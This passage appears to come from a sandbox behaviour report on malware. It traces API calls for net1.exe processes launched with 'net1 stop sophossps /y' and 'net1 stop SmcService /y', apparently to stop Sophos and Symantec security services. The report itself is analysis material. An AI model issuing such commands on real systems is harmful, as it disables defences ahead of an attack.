region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10820 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10821 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10822 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10823 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10824 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10825 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10826 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10827 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10828 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10829 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10830 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10831 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10832 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10833 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10834 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10968 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 802 os_tid = 0xa10 [0113.510] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfe50 | out: lpSystemTimeAsFileTime=0xcfe50*(dwLowDateTime=0xf8cf55b0, dwHighDateTime=0x1d48689)) [0113.510] GetCurrentProcessId () returned 0x11d0 [0113.510] GetCurrentThreadId () returned 0xa10 [0113.510] GetTickCount () returned 0x26132 [0113.510] QueryPerformanceCounter (in: lpPerformanceCount=0xcfe58 | out: lpPerformanceCount=0xcfe58*=1816042800000) returned 1 [0113.511] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0113.511] __set_app_type (_Type=0x1) [0113.511] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0113.511] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0113.512] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.512] GetConsoleOutputCP () returned 0x1b5 [0113.792] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0113.793] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.795] sprintf_s (in: _DstBuf=0xcfdf8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.795] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.797] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.797] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.797] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sophossps /y" [0113.797] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfb90, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0113.797] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.797] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfde8 | out: Buffer=0xcfde8*=0x1a4d50) returned 0x0 [0113.797] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfde8 | out: Buffer=0xcfde8*=0x1ac0f0) returned 0x0 [0113.797] _fileno (_File=0x7fefdba2a80) returned 0 [0113.797] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0113.797] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.797] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.798] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.798] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.798] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.798] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.798] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.798] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.798] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.798] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.798] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.798] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.798] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.798] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.798] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.798] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.798] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.798] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.798] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.798] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.798] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.798] _wcsicmp (_String1="accounts", _String2="sophossps") returned -18 [0113.798] _wcsicmp (_String1="computer", _String2="sophossps") returned -16 [0113.798] _wcsicmp (_String1="config", _String2="sophossps") returned -16 [0113.798] _wcsicmp (_String1="continue", _String2="sophossps") returned -16 [0113.798] _wcsicmp (_String1="cont", _String2="sophossps") returned -16 [0113.798] _wcsicmp (_String1="file", _String2="sophossps") returned -13 [0113.798] _wcsicmp (_String1="files", _String2="sophossps") returned -13 [0113.798] _wcsicmp (_String1="group", _String2="sophossps") returned -12 [0113.798] _wcsicmp (_String1="groups", _String2="sophossps") returned -12 [0113.799] _wcsicmp (_String1="help", _String2="sophossps") returned -11 [0113.799] _wcsicmp (_String1="helpmsg", _String2="sophossps") returned -11 [0113.799] _wcsicmp (_String1="localgroup", _String2="sophossps") returned -7 [0113.799] _wcsicmp (_String1="pause", _String2="sophossps") returned -3 [0113.799] _wcsicmp (_String1="session", _String2="sophossps") returned -10 [0113.799] _wcsicmp (_String1="sessions", _String2="sophossps") returned -10 [0113.799] _wcsicmp (_String1="sess", _String2="sophossps") returned -10 [0113.799] _wcsicmp (_String1="share", _String2="sophossps") returned -7 [0113.799] _wcsicmp (_String1="start", _String2="sophossps") returned 5 [0113.799] _wcsicmp (_String1="stats", _String2="sophossps") returned 5 [0113.799] _wcsicmp (_String1="statistics", _String2="sophossps") returned 5 [0113.800] _wcsicmp (_String1="stop", _String2="sophossps") returned 5 [0113.800] _wcsicmp (_String1="time", _String2="sophossps") returned 1 [0113.800] _wcsicmp (_String1="user", _String2="sophossps") returned 2 [0113.800] _wcsicmp (_String1="users", _String2="sophossps") returned 2 [0113.800] _wcsicmp (_String1="msg", _String2="sophossps") returned -6 [0113.800] _wcsicmp (_String1="messenger", _String2="sophossps") returned -6 [0113.800] _wcsicmp (_String1="receiver", _String2="sophossps") returned -1 [0113.800] _wcsicmp (_String1="rcv", _String2="sophossps") returned -1 [0113.800] _wcsicmp (_String1="netpopup", _String2="sophossps") returned -5 [0113.800] _wcsicmp (_String1="redirector", _String2="sophossps") returned -1 [0113.800] _wcsicmp (_String1="redir", _String2="sophossps") returned -1 [0113.800] _wcsicmp (_String1="rdr", _String2="sophossps") returned -1 [0113.800] _wcsicmp (_String1="workstation", _String2="sophossps") returned 4 [0113.800] _wcsicmp (_String1="work", _String2="sophossps") returned 4 [0113.801] _wcsicmp (_String1="wksta", _String2="sophossps") returned 4 [0113.801] _wcsicmp (_String1="prdr", _String2="sophossps") returned -3 [0113.801] _wcsicmp (_String1="devrdr", _String2="sophossps") returned -15 [0113.801] _wcsicmp (_String1="lanmanworkstation", _String2="sophossps") returned -7 [0113.801] _wcsicmp (_String1="server", _String2="sophossps") returned -10 [0113.801] _wcsicmp (_String1="svr", _String2="sophossps") returned 7 [0113.801] _wcsicmp (_String1="srv", _String2="sophossps") returned 3 [0113.801] _wcsicmp (_String1="lanmanserver", _String2="sophossps") returned -7 [0113.801] _wcsicmp (_String1="alerter", _String2="sophossps") returned -18 [0113.801] _wcsicmp (_String1="netlogon", _String2="sophossps") returned -5 [0113.801] _wcsupr (in: _String="sophossps" | out: _String="SOPHOSSPS") returned="SOPHOSSPS" [0113.802] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1ace00 [0113.806] GetServiceKeyNameW (in: hSCManager=0x1ace00, lpDisplayName="SOPHOSSPS", lpServiceName=0xff3f5750, lpcchBuffer=0xcfd08 | out: lpServiceName="", lpcchBuffer=0xcfd08) returned 0 [0113.808] _wcsicmp (_String1="msg", _String2="SOPHOSSPS") returned -6 [0113.808] _wcsicmp (_String1="messenger", _String2="SOPHOSSPS") returned -6 [0113.808] _wcsicmp (_String1="receiver", _String2="SOPHOSSPS") returned -1 [0113.808] _wcsicmp (_String1="rcv", _String2="SOPHOSSPS") returned -1 [0113.808] _wcsicmp (_String1="redirector", _String2="SOPHOSSPS") returned -1 [0113.808] _wcsicmp (_String1="redir", _String2="SOPHOSSPS") returned -1 [0113.808] _wcsicmp (_String1="rdr", _String2="SOPHOSSPS") returned -1 [0113.808] _wcsicmp (_String1="workstation", _String2="SOPHOSSPS") returned 4 [0113.808] _wcsicmp (_String1="work", _String2="SOPHOSSPS") returned 4 [0113.808] _wcsicmp (_String1="wksta", _String2="SOPHOSSPS") returned 4 [0113.808] _wcsicmp (_String1="prdr", _String2="SOPHOSSPS") returned -3 [0113.808] _wcsicmp (_String1="devrdr", _String2="SOPHOSSPS") returned -15 [0113.808] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOSSPS") returned -7 [0113.808] _wcsicmp (_String1="server", _String2="SOPHOSSPS") returned -10 [0113.808] _wcsicmp (_String1="svr", _String2="SOPHOSSPS") returned 7 [0113.808] _wcsicmp (_String1="srv", _String2="SOPHOSSPS") returned 3 [0113.808] _wcsicmp (_String1="lanmanserver", _String2="SOPHOSSPS") returned -7 [0113.809] _wcsicmp (_String1="alerter", _String2="SOPHOSSPS") returned -18 [0113.809] _wcsicmp (_String1="netlogon", _String2="SOPHOSSPS") returned -5 [0113.809] NetServiceControl (in: servername=0x0, service="SOPHOSSPS", opcode=0x0, arg=0x0, bufptr=0xcfd10 | out: bufptr=0xcfd10) returned 0x889 [0113.810] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.810] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0113.811] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.813] GetFileType (hFile=0xb) returned 0x2 [0113.814] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfbd8 | out: lpMode=0xcfbd8) returned 1 [0113.814] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcfbd0, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0xcfbd0*=0x1e) returned 1 [0113.815] GetFileType (hFile=0xb) returned 0x2 [0113.815] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfbd8 | out: lpMode=0xcfbd8) returned 1 [0113.815] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfbd0, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0xcfbd0*=0x2) returned 1 [0113.816] _ultow (in: _Dest=0x889, _Radix=851008 | out: _Dest=0x889) returned="2185" [0113.816] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.816] GetFileType (hFile=0xb) returned 0x2 [0113.816] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfbd8 | out: lpMode=0xcfbd8) returned 1 [0113.817] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcfbd0, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0xcfbd0*=0x34) returned 1 [0113.817] GetFileType (hFile=0xb) returned 0x2 [0113.817] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfbd8 | out: lpMode=0xcfbd8) returned 1 [0113.817] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfbd0, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0xcfbd0*=0x2) returned 1 [0113.818] NetApiBufferFree (Buffer=0x1a4d50) returned 0x0 [0113.818] NetApiBufferFree (Buffer=0x1ac0f0) returned 0x0 [0113.818] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop sophossps /y" [0113.818] exit (_Code=2) Process: id = "301" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x680d7000" os_pid = "0x908" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "261" os_parent_pid = "0xef4" cmd_line = "C:\\Windows\\system32\\net1 stop SmcService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10835 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10836 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10837 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10838 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 10839 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10840 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10841 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10842 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10843 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10844 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10845 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 10846 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10847 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 10848 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10849 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10850 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10851 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10852 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10853 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 10854 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 10855 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10856 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10857 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10858 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10859 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10860 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10861 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10862 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10863 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10864 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10865 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10866 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10867 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10868 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10869 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10870 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10871 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10872 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10969 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 803 os_tid = 0xb88 [0113.546] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f770 | out: lpSystemTimeAsFileTime=0x12f770*(dwLowDateTime=0xf8d41870, dwHighDateTime=0x1d48689)) [0113.546] GetCurrentProcessId () returned 0x908 [0113.546] GetCurrentThreadId () returned 0xb88 [0113.546] GetTickCount () returned 0x26151 [0113.546] QueryPerformanceCounter (in: lpPerformanceCount=0x12f778 | out: lpPerformanceCount=0x12f778*=1816046500000) returned 1 [0113.548] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0113.548] __set_app_type (_Type=0x1) [0113.548] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0113.549] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0113.549] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.549] GetConsoleOutputCP () returned 0x1b5 [0113.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0113.853] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.855] sprintf_s (in: _DstBuf=0x12f718, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.856] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.857] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.857] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.857] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SmcService /y" [0113.857] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f4b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0113.857] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.858] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f708 | out: Buffer=0x12f708*=0x244d50) returned 0x0 [0113.858] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f708 | out: Buffer=0x12f708*=0x24c0f0) returned 0x0 [0113.858] _fileno (_File=0x7fefdba2a80) returned 0 [0113.858] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0113.858] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.858] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.858] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.858] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.858] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.858] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.858] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.858] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.858] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.858] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.858] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.858] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.858] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.858] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.859] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.859] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.859] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.859] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.859] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.859] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.859] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.859] _wcsicmp (_String1="accounts", _String2="SmcService") returned -18 [0113.859] _wcsicmp (_String1="computer", _String2="SmcService") returned -16 [0113.859] _wcsicmp (_String1="config", _String2="SmcService") returned -16 [0113.859] _wcsicmp (_String1="continue", _String2="SmcService") returned -16 [0113.859] _wcsicmp (_String1="cont", _String2="SmcService") returned -16 [0113.859] _wcsicmp (_String1="file", _String2="SmcService") returned -13 [0113.859] _wcsicmp (_String1="files", _String2="SmcService") returned -13 [0113.859] _wcsicmp (_String1="group", _String2="SmcService") returned -12 [0113.859] _wcsicmp (_String1="groups", _String2="SmcService") returned -12 [0113.859] _wcsicmp (_String1="help", _String2="SmcService") returned -11 [0113.859] _wcsicmp (_String1="helpmsg", _String2="SmcService") returned -11 [0113.859] _wcsicmp (_String1="localgroup", _String2="SmcService") returned -7 [0113.859] _wcsicmp (_String1="pause", _String2="SmcService") returned -3 [0113.859] _wcsicmp (_String1="session", 